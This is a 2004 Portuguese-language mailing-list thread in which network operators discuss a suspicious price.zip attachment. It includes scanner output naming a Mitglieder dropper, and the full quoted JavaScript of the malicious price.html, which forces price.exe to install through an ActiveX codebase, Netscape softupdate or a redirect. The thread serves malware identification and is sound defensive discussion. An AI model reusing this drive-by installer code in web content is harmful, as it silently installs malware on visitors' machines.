Re: [GTER] Problemas com possível vírus

Wyvern wyvern at terra.com.br
Mon Aug 9 16:42:31 -03 2004


/var/inflex/tmp/inf_0809163818466/unpacked/_headers_
/var/inflex/tmp/inf_0809163818466/unpacked/textfile0
/var/inflex/tmp/inf_0809163818466/unpacked/textfile1
/var/inflex/tmp/inf_0809163818466/unpacked/price.zip->price.html  Infection:
HTML/ObjData at exp
/var/inflex/tmp/inf_0809163818466/unpacked/price.zip->price/price.exe  is a
dropper for W32/Mitglieder.W
/var/inflex/tmp/inf_0809163818466/unpacked/textfile2

----- Original Message ----- 
From: "Fabiano" <fabiano.br at uol.com.br>
To: "Grupo de Trabalho de Engenharia e Operacao de Redes"
<gter at eng.registro.br>
Sent: Monday, August 09, 2004 4:37 PM
Subject: Re: [GTER] Problemas com possível vírus




AVG atualizado não detectou (enviado amostra...)

segue código do price.zip que é na verdade uma pasta "teste/price.exe" + um
price.html


[]s
Fabiano

-----INICIO DO
.HTML---------------------------------------------------------------------
<head>
<script language="JavaScript">
var exepath='price/price.exe';
</script>

<SCRIPT LANGUAGE="JavaScript">
<!--
var bname=navigator.appName;
sewre = "rseI";
var bver=parseInt(navigator.appVersion);

function install() {
         if ( navigator.platform && navigator.platform != 'Win32' ) {
                 location.replace('NOTWIN32WARNING.html');
                 return;
         }
         if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
                 document.write('<object id="gib" width=1 height=1
classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D"
codebase="'+exepath+'"></object>');
         } else if (bname == 'Netscape' && bver >= 4) {
                 trigger = netscape.softupdate.Trigger;
                 if (trigger.UpdateEnabled) {
                         trigger.StartSoftwareUpdate(exepath,
trigger.DEFAULT_MODE)
                 } else {
                         location.replace(exepath);
                 }
         } else {
                 location.replace(exepath);
         }
}

install();

// -->
</script>
</head>
---FIM----------------------------------------------------------------------
------------------


--
GTER list    https://eng.registro.br/mailman/listinfo/gter

Esta mensagem foi verificada pelo E-mail Protegido Terra.
Scan engine: VirusScan / Atualizado em 04/08/2004 / Versão: 1.5.2
Proteja o seu e-mail Terra: http://www.emailprotegido.terra.com.br/







More information about the gter mailing list